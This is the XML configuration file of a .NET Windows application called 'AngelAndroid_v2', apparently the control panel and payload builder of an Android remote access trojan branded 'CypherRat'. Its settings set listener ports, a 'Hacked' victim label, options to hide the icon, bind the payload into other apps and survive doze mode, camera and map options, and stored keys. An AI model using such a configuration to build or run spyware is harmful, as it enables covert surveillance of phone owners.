<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <configSections>
        <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
            <section name="AngelAndroid_v2.My.MySettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false"/>
        </sectionGroup>
    </configSections>
    <startup>
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/>
    </startup>
     <userSettings>
        <AngelAndroid_v2.My.MySettings>
           <setting name="ports" serializeAs="String">
              <value>7771:7772</value>
           </setting>
           <setting name="performance" serializeAs="String">
              <value>Normal</value>
           </setting>
           <setting name="encoding8" serializeAs="String">
              <value>UTF8</value>
           </setting>
           <setting name="show_alert" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="location" serializeAs="String">
              <value>Right</value>
           </setting>
           <setting name="disconnected" serializeAs="String">
              <value>Just tell me</value>
           </setting>
           <setting name="Auto_focus" serializeAs="String">
              <value>No</value>
           </setting>
           <setting name="Effects_CAM" serializeAs="String">
              <value>Normal</value>
           </setting>
           <setting name="Style_Maps" serializeAs="String">
              <value>Streets</value>
           </setting>
           <setting name="Saving_data" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="CAMQuality" serializeAs="String">
              <value>Auto</value>
           </setting>
           <setting name="build_text_name_victim" serializeAs="String">
              <value>Hacked</value>
           </setting>
           <setting name="build_text_name_patch" serializeAs="String">
              <value>CypherRat</value>
           </setting>
           <setting name="build_text_version" serializeAs="String">
              <value>1.0.0.0</value>
           </setting>
           <setting name="build_text_sleep" serializeAs="String">
              <value>0</value>
           </setting>
           <setting name="build_text_port" serializeAs="String">
              <value>7771</value>
           </setting>
           <setting name="build_Checked_hide" serializeAs="String">
              <value>False</value>
           </setting>
           <setting name="build_Checked_icon" serializeAs="String">
              <value>False</value>
           </setting>
           <setting name="build_Checked_doze" serializeAs="String">
              <value>True</value>
           </setting>
           <setting name="build_path_icon" serializeAs="String">
              <value>null</value>
           </setting>
           <setting name="build_DGV_list" serializeAs="String">
              <value>null</value>
           </setting>
           <setting name="DefaultColorForeground" serializeAs="String">
              <value>95, 95, 250</value>
           </setting>
           <setting name="DefaultColorBackground" serializeAs="String">
              <value>50, 50, 50</value>
           </setting>
           <setting name="FontSize" serializeAs="String">
              <value>9</value>
           </setting>
           <setting name="FontStyle" serializeAs="String">
              <value>Regular</value>
           </setting>
           <setting name="EncryptionKey" serializeAs="String">
              <value>00110000</value>
           </setting>
           <setting name="DefaultColor_NewColorFiles" serializeAs="String">
              <value>Red</value>
           </setting>
           <setting name="DefaultColor_ColorTitles" serializeAs="String">
              <value>Blue</value>
           </setting>
           <setting name="BIND_Path" serializeAs="String">
              <value>null</value>
           </setting>
           <setting name="BIND_EX" serializeAs="String">
              <value>null</value>
           </setting>
           <setting name="intent" serializeAs="String">
              <value>null</value>
           </setting>
           <setting name="NOTI_SOUND" serializeAs="String">
              <value>False</value>
           </setting>
           <setting name="Flags_Visible" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="Flags_Size" serializeAs="String">
              <value>32px</value>
           </setting>
           <setting name="Round" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="SStatus_Visible" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="_Columns" serializeAs="String">
              <value>0123456789</value>
           </setting>
           <setting name="FM_IC_Size" serializeAs="String">
              <value>Small</value>
           </setting>
           <setting name="Removing_Duplicates" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="_multi_sounds" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="ImageQualty" serializeAs="String">
              <value>20</value>
           </setting>
           <setting name="Cashpic" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="LOG" serializeAs="String">
              <value>Yes</value>
           </setting>
           <setting name="DKEY" serializeAs="String">
              <value>PT1BQUFic2RGQURhY0FTQ1ZERVNEVnNkU0RSVlNEVkFFR1NTRkJSRUE=</value>
           </setting>
        </AngelAndroid_v2.My.MySettings>
    </userSettings>
</configuration>
